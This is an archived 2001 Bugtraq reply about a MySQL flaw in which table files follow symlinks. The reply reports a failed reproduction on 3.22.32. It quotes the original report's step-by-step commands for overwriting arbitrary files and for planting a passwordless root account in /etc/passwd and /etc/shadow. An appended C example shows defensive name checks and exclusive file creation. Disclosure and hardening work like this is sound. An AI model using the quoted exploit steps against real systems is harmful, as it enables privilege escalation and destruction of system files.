[19764] in bugtraq


Re: potential vulnerability of mysqld running with root privileges

daemon@ATHENA.MIT.EDU (Ryan W. Maple)
Wed Mar 21 18:44:36 2001

Message-ID:  <Pine.LNX.4.10.10103201233480.9425-100000@mastermind.inside.guardiandigital.com>
Date:         Tue, 20 Mar 2001 12:38:29 -0500
Reply-To: "Ryan W. Maple" <ryan@GUARDIANDIGITAL.COM>
From: "Ryan W. Maple" <ryan@GUARDIANDIGITAL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

I was unable to reproduce this with MySQL 3.22.32.  Here is a transcript:

  [rwm@tester tmp]$ rpm -q MySQL
  MySQL-3.22.32-1.0.8

  [rwm@tester tmp]# ps auxwww | grep mysql | grep ^root | wc -l
        4

  [rwm@tester /root]# ls -la /var/tmp/qqq.ISD
  lrwxrwxrwx   1 rwm      admin          12 Mar 20 08:46 /var/tmp/gotcha.ISD -> /root/GOTCHA


"test" is a user I created with full access (all 'Y's in mysql.user):

  [rwm@tester rwm]$ mysql -utest -ptest00 '../../tmp'
  Welcome to the MySQL monitor.  Commands end with ; or \g.
  Your MySQL connection id is 4 to server version: 3.22.32

  Type 'help' for help.

  mysql> CREATE TABLE gotcha(qqq VARCHAR(255));
  ERROR 1: Can't create/write to file '/var/tmp/gotcha.ISD' (Errcode: 13)
  mysql> INSERT INTO gotcha VALUES ("I just owned you");
  Query OK, 1 row affected (0.00 sec)


The file still contains my original string, instead of what I INSERT'd:

  [root@webtool /root]# cat /root/GOTCHA
  This is a test of the MySQL exploit. :)

3.20 is terribly old.  I would recommend upgrading anyway.  And for the
record, Red Hat 7.0 ships with a user/group 'mysql' under which the daemon
runs (I guess they read up, not sure what version of the MySQL RPM you saw
it running as root under...).

Cheers,
Ryan

 +-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+
   Ryan W. Maple                                Guardian Digital, Inc.
   "If you eliminate the redundancy, sleep is a four letter word." -CW
 +-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+


On Sun, 18 Mar 2001, Pavlov, Lesha wrote:

> Anybody who gets a login and password to mysql can use it as a DoS or r00t
> exploit, because mysql accepts '../blah-blah' as a valid database name and
> each table is represented by 3 files: tablename.ISD, tablename.ISM and
> tablename.frm. But when mysqld checks whether a table already exists or
> not, it checks _only_ tablename.frm:
>
> Using these "vulnerable features of mysql" to make a big DoS (will
> overwrite any file you wish):
> $ cd /var/tmp
> $ ln -s /some/file/you/wish/to/overwrite qqq.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table qqq(www int);
> \q
> $
> File /some/file/you/wish/to/overwrite will be overwritten.
>
> Usage as r00t exploit:
> $ cd /var/tmp
> $ ln -s /etc/passwd gotcha.ISD
> $ ln -s /etc/shadow make_me_r00t.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table gotcha(qqq varchar(255));
> create table make_me_r00t(qqq varchar(255));
> insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
> insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
> \q
> $
> You getta r00t now!
>
> Recommendations:
> * Patch mysql so that when it checks whether a table is present, it checks
> all tablename.{ISD,ISM,frm} files, not only tablename.frm
> * Patch mysql to treat database names starting with '..' as incorrect
> database names.
> * And the main recommendation - do not run mysqld as root!!!
>
> Patches:
>  not yet
>
> Workaround:
> chown existing database tables to a normal user and run mysqld as this
> unprivileged user - it will be a better solution!
>
> Vulnerable versions:
> This DoS/exploit was tested on mysql-3.20.32a, but I see other versions of
> mysql are also vulnerable.
>
> Comments:
> Mysql dox recommend not running mysqld as root, but people from RedHat
> didn't read the mysql dox - mysql installed from rpm is vulnerable.
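One way a daemon could implement the first two recommendations from the quoted report, as an added example that is not MySQL's own code: database and table names containing '/' or equal to '..' are rejected, and each of the three table files is created with O_CREAT|O_EXCL so that a pre-planted symlink such as gotcha.ISD makes the CREATE fail instead of being followed. The datadir/db/table.{frm,ISD,ISM} layout is taken from the thread; the function names and the scratch-directory self-check are this example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Names may not contain '/' nor be "." or "..", so "../../tmp" is rejected. */
int name_is_safe(const char *n) {
    return n && *n && !strchr(n, '/') && strcmp(n, ".") && strcmp(n, "..");
}

/* Create all three table files, checking each one rather than only .frm.
   Returns 0, or -1 with errno set after removing what this call created. */
int create_table_files(const char *datadir, const char *db, const char *table) {
    static const char *ext[] = { ".frm", ".ISD", ".ISM" };
    char path[3][4096];
    if (!name_is_safe(db) || !name_is_safe(table)) { errno = EINVAL; return -1; }
    for (int i = 0; i < 3; i++) {
        snprintf(path[i], sizeof path[i], "%s/%s/%s%s", datadir, db, table, ext[i]);
        /* O_CREAT|O_EXCL fails with EEXIST if anything already sits at the path,
           a planted symlink included, instead of opening the link's target. */
        int fd = open(path[i], O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
        if (fd < 0) {
            int e = errno;                    /* unlink() may clobber errno */
            while (i-- > 0) unlink(path[i]);  /* leave no half-created table */
            errno = e;
            return -1;
        }
        close(fd);
    }
    return 0;
}

/* Self-check in a scratch directory: gotcha.ISD is planted as a symlink to a
   stand-in for /etc/passwd; both creates must fail and nothing may be written. */
int symlink_is_refused(void) {
    char dir[] = "/tmp/mysql_harden_XXXXXX";
    if (!mkdtemp(dir) || chdir(dir) != 0) return 0;
    int ok = mkdir("testdb", 0700) == 0 && symlink("victim", "testdb/gotcha.ISD") == 0
          && create_table_files(".", "../../tmp", "qqq") < 0 && errno == EINVAL
          && create_table_files(".", "testdb", "gotcha") < 0 && errno == EEXIST
          && access("testdb/victim", F_OK) != 0 && access("testdb/gotcha.frm", F_OK) != 0;
    unlink("testdb/gotcha.ISD"); rmdir("testdb");
    if (chdir("/") == 0) rmdir(dir);        /* clean up the scratch directory */
    return ok;                              /* 1 when the hardening holds */
}
int main(void) { return symlink_is_refused() ? 0 : 1; }   /* exit 0 on pass */
```

Running it as an unprivileged user is enough to see the refusal; the third recommendation (not running mysqld as root) still matters, since it is what limits the damage if a check like this is ever bypassed.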
